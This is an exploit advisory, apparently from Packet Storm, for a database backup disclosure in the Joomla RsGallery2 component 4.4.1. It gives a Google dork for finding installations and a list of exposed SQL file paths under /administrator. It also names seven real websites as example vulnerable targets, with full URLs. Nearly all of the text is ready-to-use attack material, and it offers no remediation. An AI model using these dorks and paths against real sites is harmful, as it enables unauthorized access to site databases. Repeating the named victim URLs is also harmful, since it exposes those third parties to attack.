Joomla RsGallery2 4.4.1 Database Disclosure

Joomla RsGallery2 component version 4.4.1 suffers from a database disclosure vulnerability.


MD5 | 0e9a391df198dad8e20f8014f7497db6

Download
#################################################################################################

# Exploit Title : Joomla Com_RsGallery2 Components 4.4.1 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 08/12/2018
# Vendor Homepage : rsgallery2.org ~
extensions.joomla.org/extension/rsgallery2/
# Software Download Link : rsgallery2.org/index.php/download
+
github.com/RSGallery2/RSGallery2_Component/releases/download/Version_4.4.1/RSGallery2_Component.4.4.1.zip
+ github.com/RSGallery2/RSGallery2_Component/releases
+
github.com/DimaSamodurov/erasvit/blob/master/administrator/components/com_rsgallery2/sql/rsgallery2.sql
+
github.com/DimaSamodurov/erasvit/tree/master/administrator/components/com_rsgallery2
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.11 ~ 4.4.1 ~ 4.2.101 ~ 4.2.102 ~ 4.2.103 ~ 4.3.0
~
4.3.1 alpha ~ 4.3.1 ~ 4.4.1 alpha + 4.4.1 beta ~ 4.4.1_beta 2
# Exploit Risk : Medium
# Google Dorks : inurl:''/administrator/components/com_rsgallery2/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/administrator

# Exploit :

/administrator/components/com_rsgallery2/sql/rsgallery2.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.10.14_to_1.11.0.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.11.0_to_1.11.1.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.11.10_to_1.11.11.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.11.11_to_1.12.0.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.12.1_to_1.12.2.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.12.2_to_1.13.2.sql

/administrator/components/com_rsgallery2/sql/upgrade_1.13.2_to_1.14.0.sql

/administrator/sql/updates/mysql/3.0.0.sql

/administrator/sql/updates/mysql/4.0.0.sql

/administrator/sql/updates/mysql/4.3.0.sql

/administrator/sql/updates/install.mysql.utf8.sql

/administrator/sql/updates/uninstall.mysql.utf8.sql

#################################################################################################

# Example Vulnerable Site =>

[+] itsi.co.id/administrator/components/com_rsgallery2/sql/rsgallery2.sql

[+]
theglen.ca/site/administrator/components/com_rsgallery2/sql/rsgallery2.sql

[+]
airnews.co.za/home/administrator/components/com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8.sql

[+]
osmiebkk.moe.go.th/2-administrator/components/com_rsgallery2/sql/rsgallery2.sql

[+]
bunker.linkbg.com/polifron/site/administrator/components/com_rsgallery2/sql/rsgallery2.sql

[+]
protech-me.com/httpdocs/administrator/components/com_rsgallery2/sql/rsgallery2.sql

[+]
wohnbautreppen.com/treppen/administrator/components/com_rsgallery2/sql/rsgallery2.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Source: packetstormsecurity.com
Related Posts